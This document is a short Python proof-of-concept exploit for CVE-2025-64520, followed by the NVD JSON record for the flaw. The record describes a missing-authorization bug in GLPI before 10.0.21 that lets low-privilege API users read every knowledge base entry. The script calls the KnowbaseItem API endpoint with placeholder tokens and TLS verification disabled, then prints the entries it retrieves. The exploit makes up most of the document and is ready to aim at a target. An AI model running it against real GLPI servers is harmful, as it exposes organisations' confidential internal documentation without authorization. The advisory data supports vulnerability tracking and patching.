CVE-2025-64520

import requests import json # CVE-2025-64520 PoC - GLPI Knowledge Base Unauthorized Access # Target: GLPI < 10.0.21 # Author: Security Researcher TARGET_URL = "http://target-glpi-server" # Replace with target URL API_TOKEN = "your_api_token_here" # Replace with valid API token def exploit_knowledge_base_access(): """ This PoC demonstrates the unauthorized knowledge base access vulnerability in GLPI versions prior to 10.0.21 """ headers = { "Content-Type": "application/json", "Authorization": f"Bearer {API_TOKEN}", "App-Token": "app_token_here" } # Attempt to retrieve all knowledge base entries # The vulnerability allows low-privilege API users to access all entries endpoint = f"{TARGET_URL}/apirest.php/KnowbaseItem" try: # Get all knowledge base items without proper authorization check response = requests.get(endpoint, headers=headers, verify=False) if response.status_code == 200: data = response.json() print(f"[+] Successfully accessed {len(data)} knowledge base entries") print(f"[+] First entry: {json.dumps(data[0], indent=2)}" if data else "No data") return data else: print(f"[-] Failed with status code: {response.status_code}") return None except requests.RequestException as e: print(f"[-] Request failed: {e}") return None if __name__ == "__main__": print("CVE-2025-64520 - GLPI Knowledge Base Unauthorized Access") exploit_knowledge_base_access()

{"cve": {"id": "CVE-2025-64520", "sourceIdentifier": "[email protected]", "published": "2025-12-16T22:15:48.250", "lastModified": "2026-02-19T16:20:09.587", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GLPI is a free asset and IT management software package. Starting in version 9.1.0 and prior to version 10.0.21, an unauthorized user with an API access can read all knowledge base entries. Users should upgrade to 10.0.21 to receive a patch."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.1.0", "versionEndExcluding": "10.0.21", "matchCriteriaId": "2CB32F29-AA61-4565-A618-E9F88B16669C"}]}]}], "references": [{"url": "https://github.com/glpi-project/glpi/commit/a3d5cc4a63ae592c0b5592ebe6d562164904dab3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/glpi-project/glpi/security/advisories/GHSA-62p9-prpq-j62q", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}